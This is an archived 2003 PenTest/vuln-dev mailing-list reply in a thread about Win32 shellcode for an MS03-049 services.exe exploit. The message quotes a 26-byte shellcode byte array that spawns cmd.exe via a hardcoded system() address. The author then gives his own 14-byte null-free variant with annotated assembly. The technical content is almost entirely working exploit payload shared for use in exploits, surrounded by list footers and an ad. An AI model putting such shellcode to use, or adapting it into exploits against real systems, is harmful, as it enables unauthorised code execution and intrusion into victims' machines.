RE: [PenTest] Re: Win32 Shellcode question.

From: Brett Moore (brett.moore_at_security-assessment.com)
Date: 12/01/03

Next message: really blurred vision: "RE: burneye, how i can defeat it?"

Previous message: Tobias Klein: "Re: Win32 Shellcode question."
In reply to: Tobias Klein: "Re: Win32 Shellcode question."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <PenTest@yahoogroups.com>, <vuln-dev@securityfocus.com>
Date: Tue, 2 Dec 2003 11:34:30 +1300

> http://www.newroot.de/projects/winsys.c
> // very smaal win2000/NT local shellcode (smaalest i've seen)
> /* 26byte execute system("cmd.exe "); written by newroot */
>unsigned char hellcode[]=
> "\x8b\xec" // mov ebp, esp
> "\x55" // push ebp
> "\x8b\xec" // mov ebp, esp
> "\x68\x65\x78\x65\x20" // push 0x20657865
> "\x68\x63\x6d\x64\x2e" // push 0x2e646d63
> "\x8d\x45\xf8" // lea eax,[ebp-0x8]
> "\x50" // push eax
> "\xb8" // mov eax,
> "\xad\xaa\x01\x78" // 0x7801aaad <- adress of system()
> "\xff\xd0" // call eax
> ;

; 14 byte no null byte execute system("cmd")
54 push esp ; or pushf to put null terminator on
stack
68 63 6D 64 20 push 20646D63h ; push cmd
54 push esp ; push location of cmd
B8 BF 8E 01 78 mov eax,78018EBFh ; address of system()
FF D0 call eax ; call system

-----Original Message-----
From: Tobias Klein [mailto:tobias.klein@ewetel.de]
Sent: Monday, December 01, 2003 9:07 PM
To: Vinay A. Maha***; vuln-dev@securityfocus.com;
pentest@yahoogroups.com
Subject: [PenTest] Re: Win32 Shellcode question.

http://www.newroot.de/projects/winsys.c
greets newroot

At 19:29 27.11.2003 -0800, Vinay A. Maha*** wrote:
>I was writing an exploit for the MS03-049 services.exe
>stack overflow vuln

------------------------ Yahoo! Groups Sponsor ---------------------~-->
Buy Ink Cartridges or Refill Kits for your HP, Epson, Canon or Lexmark
Printer at MyInks.com. Free s/h on orders $50 or more to the US & Canada.
http://www.c1tracking.com/l.asp?cid=5511
http://us.click.yahoo.com/mOAaAA/3exGAA/qnsNAA/kgFolB/TM
---------------------------------------------------------------------~->

To unsubscribe from this group, send an email to:
PenTest-unsubscribe@yahoogroups.com

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/

Next message: really blurred vision: "RE: burneye, how i can defeat it?"

Previous message: Tobias Klein: "Re: Win32 Shellcode question."
In reply to: Tobias Klein: "Re: Win32 Shellcode question."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]